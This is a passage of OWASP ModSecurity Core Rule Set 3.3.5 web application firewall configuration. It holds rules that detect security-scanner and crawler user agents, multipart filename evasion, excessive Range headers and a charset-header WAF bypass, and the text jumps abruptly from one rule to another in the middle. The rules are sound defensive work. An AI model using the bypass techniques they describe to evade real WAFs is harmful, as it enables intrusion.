"id:913110,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found request header associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ "id:913120,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found request filename/argument associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # -=[ Scripting/Generic User-Agents ]=- # # This rule detects user-agents associated with various HTTP client libraries # and scripting languages. Detection suggests attempted access by some # automated tool. # # This rule is a sibling of rule 913100. # SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \ "id:913101,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found User-Agent associated with scripting/generic HTTP client',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-scripting',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" # # -=[ Crawler User-Agents ]=- # # This rule detects user-agents associated with various crawlers, SEO tools, # and bots, which have been reported to potentially misbehave. # These crawlers can have legitimate uses when used with authorization. # # This rule is a sibling of rule 913100. # SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \ "id:913102,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found User-Agent associated with web crawler/bot',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-crawler',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-913-SCANNER-DETECTION" modsecurity-crs-3.3.5/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf000066400000000000000000001521131446122515100233250ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # Some protocol violations are common in application layer attacks. # Validating HTTP requests eliminates a large number of application layer attacks. # # The purpose of this rules file is to enforce HTTP RFC requirements that state how # the client is supposed to interact with the server. # https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # Validate request line against the format specified in the HTTP RFC # # -=[ Rule Logic ]=- # # Uses rule negation against the regex for positive security. The regex specifies the proper # construction of URI request lines such as: # # "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] # # It also outlines proper construction for CONNECT, OPTIONS and GET requests. # # -=[ References ]=- # https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1 # http://capec.mitre.org/data/definitions/272.html # SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$" \ "id:920100,\ phase:2,\ block,\ t:none,\ msg:'Invalid HTTP Request Line',\ logdata:'%{request_line}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'" # # Identify multipart/form-data name evasion attempts # # There are possible impedance mismatches between how # ModSecurity interprets multipart file names and how # a destination app server such as PHP might parse the # Content-Disposition data: # # filename-parm := "filename" "=" value # # -=[ Rule Logic ]=- # These rules check for the existence of the ' " ; = meta-characters in # either the file or file name variables. # HTML entities may lead to false positives, why they are allowed on PL1. # Negative look behind assertions allow frequently used entities &_; # # -=[ Targets, characters and html entities ]=- # # 920120: PL1 : FILES_NAMES, FILES # ['\";=] but allowed: # &[aAoOuUyY]uml); &[aAeEiIoOuU]circ; &[eEiIoOuUyY]acute; # &[aAeEiIoOuU]grave; &[cC]cedil; &[aAnNoO]tilde; & ' # # 920121: PL2 : FILES_NAMES, FILES # ['\";=] : ' " ; = meta-characters # # Not supported by re2 (?@-]+)*$" \ "id:920470,\ phase:1,\ block,\ t:none,t:lowercase,\ msg:'Illegal Content-Type header',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # In case Content-Type header can be parsed, check the mime-type against # the policy defined in the 'allowed_request_content_type' variable. # To change your policy, edit crs-setup.conf and activate rule 900220. SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ "id:920420,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Request content type is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \ "t:lowercase,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict charset parameter within the content-type header # SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ "id:920480,\ phase:1,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Request content type charset is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule TX:1 "!@rx ^%{tx.allowed_request_content_type_charset}$" \ "t:none,\ ctl:forceRequestBodyVariable=On,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict charset parameter inside content type header to occur max once. # SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ "id:920530,\ phase:1,\ block,\ t:none,t:lowercase,\ msg:'Multiple charsets detected in content type header',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict protocol versions. # SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ "id:920430,\ phase:1,\ block,\ t:none,\ msg:'HTTP protocol version is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict file extension # SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ "id:920440,\ phase:2,\ block,\ capture,\ t:none,\ msg:'URL file extension is restricted by policy',\ logdata:'%{TX.0}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \ "t:none,t:urlDecodeUni,t:lowercase,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Backup or "working" file extension # example: index.php~, /index.php~/foo/ # SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ "id:920500,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Attempt to access a backup or working file',\ logdata:'%{TX.0}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restricted HTTP headers # # -=[ Rule Logic ]=- # The use of certain headers is restricted. They are listed in the variable # TX.restricted_headers. # # The headers are transformed into lowercase before the match. In order to # make sure that only complete header names are matching, the names in # TX.restricted_headers are wrapped in slashes. This guarantees that the # header Range (-> /range/) is not matching the restricted header # /content-range/ for example. # # This is a chained rule, where the first rule fills a set of variables of the # form TX.header_name_. The second rule is then executed for all # variables of the form TX.header_name_. # # As a consequence of the construction of the rule, the alert message and the # alert data will not display the original header name Content-Range, but # /content-range/ instead. # # # -=[ References ]=- # https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy) # SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ "id:920450,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ logdata:'Restricted header detected: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',\ chain" SecRule TX:/^header_name_/ "@within %{tx.restricted_headers}" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict response charsets that we allow. # The following rules make sure that the response will be in an ASCII-compatible charset that # phase 4 rules can properly understand and block. # # # Some servers rely on the request Accept header to determine what charset to respond with. # This rule restricts these to familiar charsets. # # Regular expression generated from util/regexp-assemble/data/920600.data. # To update the regular expression run the following shell script # (consult util/regexp-assemble/README.md for details): # util/regexp-assemble/regexp-assemble.py update 920600 # SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \ "id:920600,\ phase:1,\ block,\ t:none,t:lowercase,\ msg:'Illegal Accept header: charset parameter',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # The following rule (920620) checks for the presence of 2 or more request Content-Type headers. # Content-Type confusion poses a significant security risk to a web application. It occurs when # the server and client have different interpretations of the Content-Type header, leading to # miscommunication, potential exploitation and WAF bypass. # # Using Apache, when multiple Content-Type request headers are received, the server combines them # into a single header with the values separated by commas. For example, if a client sends multiple # Content-Type headers with values "application/json" and "text/plain", Apache will combine them # into a single header like this: "Content-Type: application/json, text/plain". # # On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each # header as a separate entity without combining them. So, if a client sends multiple Content-Type # headers, Nginx will keep them separate, maintaining the original values. # SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ "id:920620,\ phase:1,\ block,\ t:none,\ msg:'Multiple Content-Type Request Headers',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # -=[ Rule Logic ]=- # # Check the number of range fields in the Range request header. # # An excessive number of Range request headers can be used to DoS a server. # The original CVE proposed an arbitrary upper limit of 5 range fields. # # Several clients are known to request PDF fields with up to 62 range # fields. Therefore the standard rule does not cover PDF files. This is # performed in two separate (stricter) siblings of this rule. # # 920200: PL2: Limit of 5 range header fields for all filenames outside of PDFs # 920201: PL2: Limit of 62 range header fields for PDFs # 920202: PL4: Limit of 5 range header fields for PDFs # # -=[ References ]=- # https://httpd.apache.org/security/CVE-2011-3192.txt SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ phase:2,\ block,\ t:none,\ msg:'Range: Too many fields (6 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" # # This is a sibling of rule 920200 # SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920201,\ phase:2,\ block,\ t:none,\ msg:'Range: Too many fields for pdf request (63 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ "id:920230,\ phase:2,\ block,\ t:none,\ msg:'Multiple URL Encoding Detected',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/120',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" # # Missing Accept Header # # -=[ Rule Logic ]=- # This rule generates a notice if the Accept header is missing. # # Notice: The rule tries to avoid known false positives by ignoring # OPTIONS requests coming from known offending User-Agents via two # chained rules. # As ModSecurity only reports the match of the last matching rule, # the alert is misleading. # SecRule &REQUEST_HEADERS:Accept "@eq 0" \ "id:920300,\ phase:2,\ pass,\ t:none,\ msg:'Request Missing an Accept Header',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ "chain" SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ "t:none,\ setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" # # PL2: This is a stricter sibling of 920270. # SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ "id:920271,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request (non printable characters)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # Missing User-Agent Header # # -=[ Rule Logic ]=- # This rules will check to see if there is a User-Agent header or not. # SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ "id:920320,\ phase:2,\ pass,\ t:none,\ msg:'Missing User Agent Header',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'NOTICE',\ setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" # # PL2: This is a stricter sibling of 920120. # SecRule FILES_NAMES|FILES "@rx ['\";=]" \ "id:920121,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Attempted multipart/form-data bypass',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # PL2: Block on Missing Content-Type Header with Request Body # This is a stricter sibling of rule 920340. # # -=[ References ]=- # http://httpwg.org/specs/rfc7231.html#header.content-type SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ "id:920341,\ phase:2,\ block,\ t:none,\ msg:'Request Containing Content Requires Content-Type header',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ "t:none,\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # # # PL 3: This is a stricter sibling of 920270. Ascii range: Printable characters in the low range # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ "id:920272,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request (outside of printable chars below ascii 127)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # PL3: The little known x-up-devcap-post-charset request header can be used to submit # a request with a different encoding as an alternative to the charset parameter in # the Content-Type header. This can be used to circumvent charset restrictions on # the Content-Type header in ASP.NET. # Note that this only works in combination with a User-Agent prefix. # # This rule is based on a blog post by Soroush Dalili at # https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ # SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ "id:920490,\ phase:1,\ block,\ t:none,\ msg:'Request header x-up-devcap-post-charset detected in combination with prefix \'UP\' to User-Agent',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'language-aspnet',\ tag:'platform-windows',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ "t:none,\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # Cache-Control Request Header whitelist # # -=[ Rule Logic ]=- # This rule aims to strictly whitelist the Cache-Control request header # values and to blocks all violations. This should be useful to intercept # "bad bot" and tools that impersonate a real browser but with wrong request # header setup. # # The regular expression used on this rule tries to match multiple directives # in a single value, for example: "max-stale=1, max-age=2". This leads us to # use a regular expression that accepts a trailing comma to keep compatibility # with all regex engines and not PCRE only. For example: "max-stale=1, max-age=2, " # # Moreover, this regular expression allows duplicate directives sequence like: # "max-stale, max-stale=1, no-cache, no-cache". # # Standard Cache-Control directives that can be used by the client: # - max-age= # - max-stale[=] # - min-fresh= # - no-cache # - no-store # - no-transform # - only-if-cached # # References: # - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control # - https://regex101.com/r/CZ0Hxu/22 # SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ "id:920510,\ phase:1,\ block,\ t:none,\ msg:'Invalid Cache-Control request header',\ logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'header-whitelist',\ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # This is a stricter sibling of rule 920200 # SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920202,\ phase:2,\ block,\ t:none,\ msg:'Range: Too many fields for pdf request (6 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}'" # # This is a stricter sibling of 920270. # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90,95,97-122" \ "id:920273,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ 